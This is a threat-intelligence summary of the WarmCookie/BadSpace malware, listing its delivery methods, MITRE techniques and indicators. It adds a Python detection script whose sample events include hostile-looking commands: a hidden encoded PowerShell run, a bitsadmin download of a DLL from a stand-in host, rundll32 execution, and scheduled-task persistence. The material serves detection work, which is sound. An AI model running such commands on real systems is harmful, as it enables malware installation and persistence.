WarmCookie (also known as BadSpace) surfaced in April 2024 and is used for initial access and for maintaining a long-term presence on compromised hosts, delivering additional malware such as CSharp-Streamer-RAT and Cobalt Strike. It shows significant overlap with TA866 activity and with the Resident backdoor, suggesting a shared threat actor lineage. #WarmCookie #BadSpace #TA866 #ResidentBackdoor #CobaltStrike #CSharpStreamerRAT
Keypoints
- Emergence: WarmCookie was first observed in April 2024.
- Distribution Methods: Primarily spread through malspam and malvertising campaigns.
- Functionality: Offers payload deployment, file manipulation, command execution, screenshot collection, and persistence.
- Relation to Other Malware: Used to deliver CSharp-Streamer-RAT and Cobalt Strike.
- Threat Actor Attribution: Likely developed by the same actor behind the Resident backdoor and TA866/Asylum Ambuscade.
- Campaign Themes: Uses lure themes such as invoice-related and job agency messages.
- Evolution: The latest samples show updates to execution methods and persistence mechanisms, with changes to C2 handling and sandbox awareness.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – Malspam and PDFs used to deliver WarmCookie. – “Malspam and malvertising campaigns used to deliver malware.”
- [T1566.002] Phishing: Spearphishing Link – PDFs contain hyperlinks directing to web servers hosting malicious JavaScript. – “The PDFs contain hyperlinks that direct victims to web servers hosting malicious JavaScript files that continue the infection process.”
- [T1189] Drive-by Compromise – Malvertising campaigns to initiate infection and delivery. – “these campaigns typically rely on malspam or malvertising to initiate the infection process that results in the delivery of WarmCookie.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – Execution flow involves PowerShell commands. – “deobfuscates and executes a PowerShell command that uses Bitsadmin to retrieve and execute the WarmCookie DLL.”
- [T1197] BITS Jobs – Use of Bitsadmin to fetch and run payloads. – “uses Bitsadmin to retrieve and execute the WarmCookie DLL.”
- [T1053.005] Persistence: Scheduled Task – Creation of scheduled tasks to maintain persistence. – “creating a scheduled task via the Windows Task Scheduler, which spawns a copy of the malware after waiting for 60 seconds.”
- [T1071.001] Web Protocols – C2 communications over SSL-enabled channels. – “Communications with C2 servers using SSL certificates.”
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – DLL payloads executed via rundll32 with Start parameters. – “rundll32.exe ,Start /p”
- [T1003] Credential Dumping – Possible use of credential dumping techniques noted in the analysis. – “Potential use of credential dumping techniques.”
Indicators of Compromise
- [URL] Web delivery path – /wp-content/upgrade/update[.]php, hosted on an infrastructure cluster (LandUpdates808). – examples: /wp-content/upgrade/update[.]php
- [File name] Attachment pattern – Attachment_[0-9]{3}-[0-9]{3}.pdf, used in malspam campaigns. – examples: Attachment_123-456.pdf, Attachment_000-111.pdf
- [Email Subject] Malspam subjects – “United Rentals Inc: Invoice# [0-9]{9}-[0-9]{3}” and “Invoice and Remittance.”
- [Domain] Infrastructure cluster – LandUpdates808 cluster used for hosting malicious JavaScript downloaders.
- [Archive] ZIP archives – Used to compress the JavaScript downloader before delivery.
- [Signature] ClamAV signatures – Win.Malware.Warmcookie-10036688-0, Win.Malware.CSsharpStreamer-10036641-0 (detection signatures referenced in the analysis).
- [Signature] Additional detections – Js.Downloader.Agent-10022279-0, Js.Trojan.Screenshotter-10022306-0, Win.Malware.Warmcookie-10036688-0 (examples seen in the signature lists).
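The following is an added triage example, not code from the Talos analysis: it turns the MITRE behaviours above (PowerShell, bitsadmin transfer, rundll32 with the quoted ",Start /p" invocation, scheduled task creation) and the indicator patterns (attachment naming, invoice subjects, the /wp-content/upgrade/update.php path) into rules run over a handful of constructed log events. The sample events, the .invalid hostnames and the exact regular expressions are assumptions chosen for illustration; the chain_score helper simply counts how many distinct stages of the described execution chain were seen, which is a useful prioritisation signal when the individual rules are noisy on their own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    tag: str       # MITRE technique ID or IoC category from the summary above
    reason: str    # analyst-readable explanation
    evidence: str  # the field that matched


# Behavioural rules over process command lines, one per technique in the summary.
# Patterns are deliberately loose: they are triage signals, not proof of infection.
PROCESS_RULES = (
    ("T1059.001", "PowerShell launched hidden or with an encoded command",
     re.compile(r"\bpowershell(\.exe)?\b.*(-enc\b|-w\s+hidden\b)", re.I)),
    ("T1197", "bitsadmin used to transfer a file (payload retrieval)",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("T1218.011", "rundll32 calling a DLL export named Start with /p (quoted form above)",
     re.compile(r"\brundll32(\.exe)?\b.*,\s*Start\b.*\s/p\b", re.I)),
    ("T1053.005", "scheduled task created (persistence)",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I)),
)

# Indicator patterns taken from the IoC list above (regexes are assumptions).
IOC_RULES = {
    "attachment": (re.compile(r"^Attachment_\d{3}-\d{3}\.pdf$", re.I),
                   "malspam attachment naming pattern"),
    "subject": (re.compile(r"^(United Rentals Inc: Invoice# \d{9}-\d{3}|Invoice and Remittance\.?)$", re.I),
                "malspam subject line"),
    "url": (re.compile(r"/wp-content/upgrade/update\.php(\?|$)", re.I),
            "delivery path associated with the LandUpdates808 cluster"),
}


def check_process(cmdline: str) -> list:
    return [Finding(tag, reason, cmdline) for tag, reason, rx in PROCESS_RULES if rx.search(cmdline)]


def check_email(subject: str, attachment: str) -> list:
    findings = []
    rx, reason = IOC_RULES["subject"]
    if rx.search(subject):
        findings.append(Finding("IOC:subject", reason, subject))
    rx, reason = IOC_RULES["attachment"]
    if rx.search(attachment):
        findings.append(Finding("IOC:attachment", reason, attachment))
    return findings


def check_url(url: str) -> list:
    rx, reason = IOC_RULES["url"]
    return [Finding("IOC:url", reason, url)] if rx.search(url) else []


def scan(events: list) -> list:
    """Dispatch each event dict to the matching checker and collect findings."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            findings.extend(check_process(ev["cmdline"]))
        elif ev["type"] == "email":
            findings.extend(check_email(ev["subject"], ev.get("attachment", "")))
        elif ev["type"] == "url":
            findings.extend(check_url(ev["url"]))
    return findings


def chain_score(findings: list) -> int:
    """Count distinct stages of the described chain (0-4) seen among the findings."""
    stages = {"T1059.001", "T1197", "T1218.011", "T1053.005"}
    return len(stages & {f.tag for f in findings})


# Constructed sample events (hypothetical; hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    {"type": "email", "subject": "United Rentals Inc: Invoice# 123456789-001",
     "attachment": "Attachment_123-456.pdf"},
    {"type": "email", "subject": "Team lunch on Friday", "attachment": "menu.pdf"},
    {"type": "url", "url": "http://lure-example.invalid/wp-content/upgrade/update.php"},
    {"type": "url", "url": "https://example.invalid/index.html"},
    {"type": "process", "cmdline": "powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"type": "process", "cmdline": "bitsadmin.exe /transfer job /download /priority high "
                                   "http://lure-example.invalid/upd.dll C:\\Users\\Public\\upd.dll"},
    {"type": "process", "cmdline": "rundll32.exe C:\\Users\\Public\\upd.dll,Start /p"},
    {"type": "process", "cmdline": "schtasks.exe /create /tn Updater "
                                   "/tr \"rundll32.exe C:\\Users\\Public\\upd.dll,Start /p\" /sc minute /mo 1"},
    {"type": "process", "cmdline": "notepad.exe C:\\Users\\me\\notes.txt"},
]

if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.tag}] {f.reason}: {f.evidence}")
    print("chain stages observed:", chain_score(results))
```

Note that the scheduled-task event yields two findings, because the task action itself contains the rundll32 invocation; that is expected and mirrors the summary's description of a task that spawns a copy of the malware. In production these rules would be fed from Sysmon or EDR process-creation events and mail-gateway metadata rather than the inline list.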
Read more: https://blog.talosintelligence.com/warmcookie-analysis/